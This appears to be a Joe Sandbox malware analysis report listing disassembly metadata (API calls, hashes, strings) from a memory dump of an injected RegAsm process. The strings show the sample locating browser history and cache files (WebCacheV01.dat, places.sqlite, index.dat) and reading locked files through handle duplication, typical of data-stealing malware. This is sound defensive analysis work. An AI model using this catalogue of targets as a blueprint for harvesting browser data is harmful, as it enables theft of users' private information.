                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 669240632-0
                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                          APIs
                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                          • memset.MSVCRT ref: 00414C87
                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                          • wcscpy.MSVCRT ref: 00414CFC
                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                          • API String ID: 2925649097-2036018995
                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                          APIs
                                          • wcschr.MSVCRT ref: 00414458
                                          • _snwprintf.MSVCRT ref: 0041447D
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                          • String ID: "%s"
                                          • API String ID: 1343145685-3297466227
                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                          APIs
                                          • memset.MSVCRT ref: 004087D6
                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                          • memset.MSVCRT ref: 00408828
                                          • memset.MSVCRT ref: 00408840
                                          • memset.MSVCRT ref: 00408858
                                          • memset.MSVCRT ref: 00408870
                                          • memset.MSVCRT ref: 00408888
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                          • String ID:
                                          • API String ID: 2911713577-0
                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: @ $SQLite format 3
                                          • API String ID: 1475443563-3708268960
                                          • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                          • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: _wcsicmpqsort
                                          • String ID: /nosort$/sort
                                          • API String ID: 1579243037-1578091866
                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                          • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModuleProcessTimes
                                          • String ID: GetProcessTimes$kernel32.dll
                                          • API String ID: 116129598-3385500049
                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                          APIs
                                          • memset.MSVCRT ref: 0040E60F
                                          • memset.MSVCRT ref: 0040E629
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Strings
                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                          • API String ID: 2887208581-2114579845
                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                          APIs
                                          • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID:
                                          • API String ID: 3473537107-0
                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                          • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                          • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                          • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                          Strings
                                          • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: only a single result allowed for a SELECT that is part of an expression
                                          • API String ID: 2221118986-1725073988
                                          • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                          • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                          • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                          • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: $$8
                                          • API String ID: 1475443563-435121686
                                          • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                          • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                          • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                          Strings
                                          • duplicate column name: %s, xrefs: 004307FE
                                          • too many columns on %s, xrefs: 00430763
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: duplicate column name: %s$too many columns on %s
                                          • API String ID: 0-1445880494
                                          • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                          • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                          • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                          • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                          APIs
                                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                            • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                            • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                            • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                            • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                          • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                            • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                          • String ID:
                                          • API String ID: 1979745280-0
                                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                          APIs
                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                          • memset.MSVCRT ref: 00403A55
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                          • String ID: history.dat$places.sqlite
                                          • API String ID: 2641622041-467022611
                                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                          APIs
                                            • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                          • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                          • GetLastError.KERNEL32 ref: 00417627
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLast$File$PointerRead
                                          • String ID:
                                          • API String ID: 839530781-0
                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID: *.*$index.dat
                                          • API String ID: 1974802433-2863569691
                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                          • GetLastError.KERNEL32 ref: 004175A2
                                          • GetLastError.KERNEL32 ref: 004175A8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FilePointer
                                          • String ID:
                                          • API String ID: 1156039329-0
                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                          • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleTime
                                          • String ID:
                                          • API String ID: 3397143404-0
                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                          APIs
                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                          • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Temp$DirectoryFileNamePathWindows
                                          • String ID:
                                          • API String ID: 1125800050-0
                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: CloseHandleSleep
                                          • String ID: }A
                                          • API String ID: 252777609-2138825249
                                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                          APIs
                                          • malloc.MSVCRT ref: 00409A10
                                          • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                          • free.MSVCRT ref: 00409A31
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: freemallocmemcpy
                                          • String ID:
                                          • API String ID: 3056473165-0
                                          • Opcode ID: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                          • Opcode Fuzzy Hash: 0cc23514b9f591a39d03d4999c8af68a80e5b36a5109517fb0274444d0dd49bc
                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: BINARY
                                          • API String ID: 2221118986-907554435
                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                          APIs
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                          • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                          • _mbscat.MSVCRT ref: 0040525B
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 568699880-0
                                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                          Memory Dump Source
